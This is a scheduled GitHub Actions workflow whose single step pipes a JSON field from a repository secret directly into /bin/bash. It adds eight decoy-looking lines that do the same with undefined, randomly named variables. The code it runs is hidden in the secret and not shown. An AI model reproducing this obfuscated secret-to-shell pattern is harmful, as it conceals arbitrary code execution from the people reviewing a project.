name: mengshufanji

on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mengshufanji
        env:
          d13699: ${{ secrets.d13699 }}
        run: |
          echo $d13699 | jq -r .s943 | /bin/bash
          echo $azs673 | jq -r .ijgrx18609 | /bin/bash
          echo $cs385 | jq -r .qku41 | /bin/bash
          echo $ds51399 | jq -r .dxm51 | /bin/bash
          echo $izj0 | jq -r .oqw354 | /bin/bash
          echo $rn57409 | jq -r .doqnx5 | /bin/bash
          echo $z37725 | jq -r .yak0581 | /bin/bash
          echo $su1 | jq -r .znl031 | /bin/bash
          echo $schhc533 | jq -r .aicgn82796 | /bin/bash

